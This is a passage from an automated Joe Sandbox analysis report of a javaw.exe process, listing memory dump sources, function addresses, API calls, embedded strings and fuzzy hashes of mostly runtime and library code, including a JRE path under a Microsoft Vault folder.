Associated: 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208959533.000000006FA5F000.00000004.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208984957.000000006FA60000.00000002.00000001.01000000.00000018.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa40000_javaw.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 8ecd0ce03b17fa2b514f140d75633e15921ef7a721b7e3d6562b967bae26c44f
Instruction ID: 101f303363ed09ed351b3e0c413cae15272d10a12e9879a34de300291748ca86
Opcode Fuzzy Hash: 8ecd0ce03b17fa2b514f140d75633e15921ef7a721b7e3d6562b967bae26c44f
Instruction Fuzzy Hash: 16010835110B149ED636AE22ED04796F7F0EF81622F25492ED191506E09B79B9D8CEA0

Function 6FAB0EBF Relevance: 9.4, APIs: 3, Strings: 3, Instructions: 350stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6FAB118A
strncmp.MSVCRT ref: 6FAB11DF
strncmp.MSVCRT ref: 6FAB122F

Strings

false, xrefs: 6FAB1224
true, xrefs: 6FAB11D4
null, xrefs: 6FAB117F

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: strncmp
String ID: false$null$true
API String ID: 1114863663-2913297407
Opcode ID: 4de0449b2fb7323fe57c1d2556886a0b6b3461b6bada2e7f915840d8b6e7cedc
Instruction ID: a304fc313f25cf27ae3d65e2b13736bbdc557605d057631d92eb2b9f10a583d5
Opcode Fuzzy Hash: 4de0449b2fb7323fe57c1d2556886a0b6b3461b6bada2e7f915840d8b6e7cedc
Instruction Fuzzy Hash: 5CD1F670A082458ED7119F68C1907FABBFEBF06314F98925EC4E09B685E33DA4C6C755

Function 6FB1D690 Relevance: 9.1, APIs: 6, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6FB1D6BF
vfprintf.MSVCRT ref: 6FB1D6DF
abort.MSVCRT ref: 6FB1D6E4
VirtualQuery.KERNEL32 ref: 6FB1D77B

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID:
API String ID: 2513968241-0
Opcode ID: a9bb751b9d0aaae1255439eb6ed027478d0e0d4cd95c140155cd268e508b9051
Instruction ID: 861c5508b048bab58f14d920539af330803b8df1f9061255e56311fc56eaf9e7
Opcode Fuzzy Hash: a9bb751b9d0aaae1255439eb6ed027478d0e0d4cd95c140155cd268e508b9051
Instruction Fuzzy Hash: 825172B29087519FD710EF29E98465EFBF1FF89364F41892DE4888B254D730E849CB92

Function 6D5EAC30 Relevance: 9.1, APIs: 6, Instructions: 68stringwindowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6D5270DC,?,?), ref: 6D5EAC34
FormatMessageA.KERNEL32(00001200,00000000,00000000,00000000,?,?,00000000,?,?,6D5270DC,?,?), ref: 6D5EAC51
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6D5270DC,?,?), ref: 6D5EAC81
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6D5270DC,?,?), ref: 6D5EAC89
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,6D5270DC,?,?), ref: 6D5EAC8D
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000001), ref: 6D5EACB9

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: _errno$ErrorFormatLastMessagestrerrorstrncpy
String ID:
API String ID: 2123179679-0
Opcode ID: 41fbb9abad9e359217f08b0eb3f116919787266a8fa79ca7f5bac607d5c3c634
Instruction ID: 2ec18aa21b8cd624bd656b1eedd873f1458fb5e4f0ccdc268c09f7486a95bd1c
Opcode Fuzzy Hash: 41fbb9abad9e359217f08b0eb3f116919787266a8fa79ca7f5bac607d5c3c634
Instruction Fuzzy Hash: 68115B32608646AFEB01ABB4D808FA97FB5EB82394F1440A4F40CCB551C777E441C790

Function 6FB20870 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 316COMMON

Download Yara Rule

Strings

0, xrefs: 6FB20C4A

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 2b6f72e13b457788c6b99447381c8e7c1eb61e9afc708474b8d516133bea84c3
Instruction ID: ed046e9867b48f424b136d5c1c6afa7f77249fd17b4b9088a78e3c6f6e67d63f
Opcode Fuzzy Hash: 2b6f72e13b457788c6b99447381c8e7c1eb61e9afc708474b8d516133bea84c3
Instruction Fuzzy Hash: ECC17B71A047468FDB14CF6DD4A47AEB7F2FF89380F549629D89A9B394E334E8418B40

Function 00E0C651 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00E0C648,00E0C47C,00E09E40), ref: 00E0C65F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E0C66D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E0C686
SetLastError.KERNEL32(00000000,00E0C648,00E0C47C,00E09E40), ref: 00E0C6D8

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b377d353ea6da2938798ebce09068e786a38fbfeeb914696f60f6286e5d4c640
Instruction ID: a0e77a23f58575de5c63ff34508d7a6c5fc26f227c24ae59aff4c342864c0e17
Opcode Fuzzy Hash: b377d353ea6da2938798ebce09068e786a38fbfeeb914696f60f6286e5d4c640
Instruction Fuzzy Hash: 7701FC3225931A6EE63827B57D8AA762A94DB41F78B313329F111740E1EF534CC56541

Function 6FA719E2 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 6FA71A22
malloc.MSVCRT ref: 6FA71B9C

Strings

unknown error, xrefs: 6FA71B3D
udf, xrefs: 6FA71A1B
src/main/java/org/sqlite/core/NativeDB.c, xrefs: 6FA71A13

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: _assertmalloc
String ID: src/main/java/org/sqlite/core/NativeDB.c$udf$unknown error
API String ID: 515528698-4104420919
Opcode ID: bb5d30a050fe4ef0901827d4453280966036d1b83d2976089b61d3662266b782
Instruction ID: 2fdd33796c3b76771a433046d843f49a92bdfc083ee0843e7345691c442ded3b
Opcode Fuzzy Hash: bb5d30a050fe4ef0901827d4453280966036d1b83d2976089b61d3662266b782
Instruction Fuzzy Hash: F0919EB49087059FC704EF69C184A6EBBF4BF89310F11896EE8999B315DB349845CF92

Function 00E1FFE7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe, xrefs: 00E20003

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
API String ID: 0-2207973928
Opcode ID: 9631709155a3b0de8ce9544c6595c62e473be66bf9bd1703ce48cbcf1c86fea2
Instruction ID: 22dcfb86be758698cfb48da41b8fea507077ee5f34b027a789a49dd742421439
Opcode Fuzzy Hash: 9631709155a3b0de8ce9544c6595c62e473be66bf9bd1703ce48cbcf1c86fea2
Instruction Fuzzy Hash: 0521A431604225AFEB20AF61EC45E6B77A9BF40368B105915F955B71D3D770EC408790

Function 00E17707 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00E17749

Strings

.bat, xrefs: 00E17778
.cmd, xrefs: 00E17767
.exe, xrefs: 00E17756
.com, xrefs: 00E17789

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: b65de240bc845099bc0d2dbc8e918e91a314df07d25aa06c6d39f2ed47208d37
Instruction ID: 1918ed997666db8b7201262d32573266f70b61a3ec8fdfb29a0a10d7f0d50641
Opcode Fuzzy Hash: b65de240bc845099bc0d2dbc8e918e91a314df07d25aa06c6d39f2ed47208d37
Instruction Fuzzy Hash: 02014937A493312566146029BC42AA723F89B92FB9B26603BF89DF71C1EE44DCC25191

Function 6FA54E2D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,6FA41224,00000000), ref: 6FA552DC
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,6FA41224,00000000), ref: 6FA552E9
_CxxThrowException.VCRUNTIME140(?,6FA5E6CC), ref: 6FA55ADE
_CxxThrowException.VCRUNTIME140(?,6FA5E720), ref: 6FA55AFB

Strings

Unknown exception, xrefs: 6FA55B08

Memory Dump Source

Source File: 00000010.00000002.3208903167.000000006FA41000.00000020.00000001.01000000.00000018.sdmp, Offset: 6FA40000, based on PE: true

Associated: 00000010.00000002.3208878111.000000006FA40000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208959533.000000006FA5F000.00000004.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208984957.000000006FA60000.00000002.00000001.01000000.00000018.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa40000_javaw.jbxd

Similarity

API ID: ExceptionThrow$_callnewhmalloc
String ID: Unknown exception
API String ID: 4113974480-410509341
Opcode ID: 82056f0d424235f4fce20d84a53dfbd1d42cdc6c140311c5ded83f7416ef4144
Instruction ID: 280a7d9919bfc5c6de4e70489060a1c1efc4aae8c9342aec309d48fd177c223a
Opcode Fuzzy Hash: 82056f0d424235f4fce20d84a53dfbd1d42cdc6c140311c5ded83f7416ef4144
Instruction Fuzzy Hash: 9CF0D13681430DBE8B00EAEDEE48AAD776C5E0025CB904121A924998D1FB7CE5F5CAD0

Function 6FA542D3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000024,00000000,6FA51E32,00000000,?,00000000,00000000,00000010,?,?,?,6FA4683C,00000000,?,00000010,?), ref: 6FA542E1
isdigit.API-MS-WIN-CRT-STRING-L1-1-0(00000024,00000000,6FA51E32,00000000,?,00000000,00000000,00000010,?,?,?,6FA4683C,00000000,?,00000010,?), ref: 6FA542EB
isupper.API-MS-WIN-CRT-STRING-L1-1-0(00000024,00000000), ref: 6FA542FC
islower.API-MS-WIN-CRT-STRING-L1-1-0(00000024), ref: 6FA5430D

Strings

$, xrefs: 6FA542D3

Memory Dump Source

Source File: 00000010.00000002.3208903167.000000006FA41000.00000020.00000001.01000000.00000018.sdmp, Offset: 6FA40000, based on PE: true

Associated: 00000010.00000002.3208878111.000000006FA40000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208959533.000000006FA5F000.00000004.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208984957.000000006FA60000.00000002.00000001.01000000.00000018.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa40000_javaw.jbxd

Similarity

API ID: isdigitislowerisuppertoupper
String ID: $
API String ID: 2941871354-3993045852
Opcode ID: d07636e61ea16178033b145007e5b9e99730c3f6b36969104dd8c89d52803cea
Instruction ID: 96220c1bc9c1a805c590019270827b10b487fe1da1b1d8059059cd335e0ebfea
Opcode Fuzzy Hash: d07636e61ea16178033b145007e5b9e99730c3f6b36969104dd8c89d52803cea
Instruction Fuzzy Hash: 9EF0D131449A22DAEA149738E5785CE77E8BF0B371B048A16FC94D21E0C738E5F1C652

Function 00E11269 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F3FD1227,?,?,00000000,00E2871C,000000FF,?,00E11245,00000002,?,00E11219,00E1A1A8), ref: 00E1129E
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E112B0
FreeLibrary.KERNEL32(00000000,?,?,00000000,00E2871C,000000FF,?,00E11245,00000002,?,00E11219,00E1A1A8), ref: 00E112D2

Strings

CorExitProcess, xrefs: 00E112A8
mscoree.dll, xrefs: 00E11297

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b14a4c6c34ddf8937cecaf80ff5315399a8429d446b3f4df0dd0488801d7fb2e
Instruction ID: f7bcd67e5e4000985d230bff2228fb7b211893348928e346596d993bd22b6309
Opcode Fuzzy Hash: b14a4c6c34ddf8937cecaf80ff5315399a8429d446b3f4df0dd0488801d7fb2e
Instruction Fuzzy Hash: B201D631A00669EFDB218F91DD0AFEEBBB8FB04B15F001225F911F22E0DB749904CA90

Function 00E05638 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(jvm.dll,?,00E026C1,?,java/lang/String), ref: 00E05647
GetProcAddress.KERNEL32(00000000,JVM_FindClassFromBootLoader), ref: 00E0565C

Strings

jvm.dll, xrefs: 00E05642
Error: loading: %s, xrefs: 00E0566C
JVM_FindClassFromBootLoader, xrefs: 00E05655, 00E0565A, 00E0566B

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Error: loading: %s$JVM_FindClassFromBootLoader$jvm.dll
API String ID: 1646373207-1240634009
Opcode ID: 790eaa9cf631c846e2cadfd7946c32130894940993ba0753d0d6362da4dbf2bc
Instruction ID: cac26f5ab58a5129bcf38b192b6c2dbec38151761c05308bd904ba3c6bcb7571
Opcode Fuzzy Hash: 790eaa9cf631c846e2cadfd7946c32130894940993ba0753d0d6362da4dbf2bc
Instruction Fuzzy Hash: 16E092332487266FDF2057B67C09A9B3B98AB903747546039F409F1090E731C8848E55

Function 6D6F4A3F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,6D6F49DC,00000064), ref: 6D6F4A62
LeaveCriticalSection.KERNEL32(6D7D6564,00000000,?,6D6F49DC,00000064,?,00000000,?,6D51EA98,6D7CB7D0,?,00000000), ref: 6D6F4A6C
WaitForSingleObjectEx.KERNEL32(00000000,00000000,?,6D6F49DC,00000064,?,00000000,?,6D51EA98,6D7CB7D0,?,00000000), ref: 6D6F4A7D
EnterCriticalSection.KERNEL32(6D7D6564,?,6D6F49DC,00000064,?,00000000,?,6D51EA98,6D7CB7D0,?,00000000), ref: 6D6F4A84

Strings

de}m, xrefs: 6D6F4A66

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID: de}m
API String ID: 3269011525-1921952989
Opcode ID: ff6af6811cfab0b25d4c396b757bef3e4c4cea7384cd6536ec7936fadaf2651a
Instruction ID: d107af883be863e21363cbda0eeadc38dd9c22205e56b61b90b0b019f5f0d5fe
Opcode Fuzzy Hash: ff6af6811cfab0b25d4c396b757bef3e4c4cea7384cd6536ec7936fadaf2651a
Instruction Fuzzy Hash: EEE0923280192CBBCF019FD9DE09B9D7E3AFB0B765B004020F50656109C7615B81CFC6

Function 00E240FF Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00E24184
__alloca_probe_16.LIBCMT ref: 00E2424D
__freea.LIBCMT ref: 00E242B4

Part of subcall function 00E1B5E0: RtlAllocateHeap.NTDLL(00000000,00E1D5A0,?,?,00E1D5A0,00000220,?,00000000,?), ref: 00E1B612

__freea.LIBCMT ref: 00E242C7
__freea.LIBCMT ref: 00E242D4

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: b451d1cc33cee16b5560b2b94b7ca62f40945c64f43c58a2528aaf6becbb05b4
Instruction ID: ec3e2d36dd184b1631e2d5c287162fb1d9878e542cc460efbf68a3cd3c06063e
Opcode Fuzzy Hash: b451d1cc33cee16b5560b2b94b7ca62f40945c64f43c58a2528aaf6becbb05b4
Instruction Fuzzy Hash: B151D7B3600226EFDB21AF62EC41EFB7AEADF54714B151129FD04F61A1EB30CD508660

Function 6FAB4ACE Relevance: 7.6, APIs: 6, Instructions: 105stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6FAB4B22
memcmp.MSVCRT ref: 6FAB4B42
memcmp.MSVCRT ref: 6FAB4B6C
memcmp.MSVCRT ref: 6FAB4B96
memcmp.MSVCRT ref: 6FAB4BC8

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: memcmp$strlen
String ID:
API String ID: 3738950036-0
